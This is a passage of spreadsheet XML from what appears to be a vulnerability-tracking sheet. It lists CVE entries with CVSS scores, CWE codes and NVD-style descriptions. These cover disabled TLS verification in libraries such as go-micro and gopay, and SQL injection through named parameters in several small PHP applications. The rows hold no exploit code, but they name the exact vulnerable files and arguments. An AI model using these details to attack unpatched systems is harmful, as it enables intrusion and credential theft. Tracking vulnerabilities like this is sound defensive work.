      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>go-micro before 6.0.0 contains an improper certificate validation vulnerability that allows network attackers to impersonate services because the shared TLS helper sets InsecureSkipVerify to true by default. Man-in-the-middle attackers can present any certificate to intercept or modify gRPC transport, HTTP and RabbitMQ broker, and Consul or etcd registry traffic, including authentication tokens and credentials.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105216</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105218</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>7.4</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2026-10-04</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>gopay before 1.5.119 disables TLS certificate verification in defaultClient() in pkg/xhttp/client.go, allowing man-in-the-middle attackers to impersonate payment provider APIs. Attackers can present any certificate to read merchant credentials, signatures and transaction data, and modify payment, refund and order query responses.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105218</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105221</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>The gist RubyGem before 6.1.0 contains an improper certificate validation vulnerability that allows on-path attackers to intercept HTTPS traffic because http_connection in lib/gist.rb sets VERIFY_NONE. Attackers can present any certificate to read or modify GitHub API traffic, stealing OAuth tokens and login credentials to read and modify the victim's gists.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105221</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105222</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>7.4</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2026-10-04</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>The alexpechkarev/google-maps Laravel package through 12.16 disables TLS certificate verification by default because the bundled config sets ssl_verify_peer to FALSE, which is passed to CURLOPT_SSL_VERIFYPEER. On-path attackers can present any certificate to intercept Google Maps web-service requests, steal the API key from the query string, and tamper with responses.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105222</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105223</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>maclof kubernetes-client 0.17.0 before 0.32.0 disables TLS certificate verification in parseKubeconfig() and parseKubeconfigFile() when a kubeconfig lacks certificate-authority-data, ignoring insecure-skip-tls-verify. On-path attackers can impersonate the Kubernetes API server to capture Bearer tokens or Basic credentials and tamper with WebSocket or REST API traffic.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105223</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105294</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>7.4</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2026-10-05</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Legcord 1.1.0 through 1.3.0 contains a configuration injection vulnerability that allows script in the Discord page to write any config key via the window.legcord settings.setConfig bridge. Attackers exploiting a Discord XSS can set additionalArguments to persistently add --proxy-server and --ignore-certificate-errors switches, routing all client traffic through an interception proxy.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105294</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105147</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SciPhi-AI R2R up to 3.6.6. This affects an unknown part of the component JWT Secret Handler. This manipulation of the argument DEFAULT_BCRYPT_SECRET_KEY/DEFAULT_NACL_SECRET_KEY causes hard-coded credentials. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105147</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105148</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SciPhi-AI R2R up to 3.6.6. This vulnerability affects unknown code of the file py/shared/abstractions/llm.py of the component Retrieval Completion API Endpoint. Such manipulation of the argument generation_config.api_base leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105148</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105149</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in mooSocial up to 3.2.4. This issue affects some unknown processing of the file /stores/all-products. Performing a manipulation of the argument rating results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105149</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105158</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in RainyGao DocSys up to 2.02.85. The impacted element is the function BaseController.createDBForMysql of the file BaseController.java of the component Database Management. The manipulation of the argument url results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105158</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105166</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The affected element is the function insert of the file fooddonateform.php of the component Food Donation Form. Performing a manipulation of the argument image-choice results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105166</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105167</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The impacted element is an unknown function of the file admin/donate.php. Executing a manipulation of the argument location can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105167</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105169</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This impacts an unknown function of the file delivery/delivery.php of the component Take Order Handler. The manipulation of the argument order_id/delivery_person_id results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105169</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105170</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Affected is an unknown function of the file admin/signup.php of the component Admin Signup. This manipulation of the argument sign causes missing authentication.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 s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105170</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105172</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Online Admission System 1.0. Affected by this issue is some unknown functionality of the file /login1.php. Performing a manipulation of the argument User results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105172</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105175</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Drug Recommendation System 1.0. This issue affects some unknown processing of the file /Auth/add_student.php of the component Student Registration. The manipulation of the argument cmdschool results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105175</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105182</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/activities/btn_functions.php?action=update. The manipulation of the argument Title results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105182</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105183</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in itsourcecode Online Admission System 1.0. The affected element is an unknown function of the file /admin/confirm.php. This manipulation of the argument schedid causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105183</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105184</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2026-10-05</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Online Admission System 1.0. The impacted element is an unknown function of the file /admin/creteria.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105184</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105185</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Online Admission System 1.0. This affects an unknown function of the file /admin/examinee.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105185</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105229</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2026-10-05</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. This issue affects some unknown processing of the file signup.php of the component User Registration Endpoint. Executing a manipulation of the argument email/name/gender can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105229</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105230</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>7.3</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2026-10-05</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. Impacted is an unknown function of the file delivery/deliverymyord.php. The manipulation of the argument delivery_person_id/order_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105230</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105231</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The affected element is an unknown function of the file admin/signup.php of the component Admin Registration. The manipulation of the argument email/username/location results in sql injection. It is possible to launch the attack remotely. The exploit is now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T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105231</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105232</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>7.3</v>
      </c>
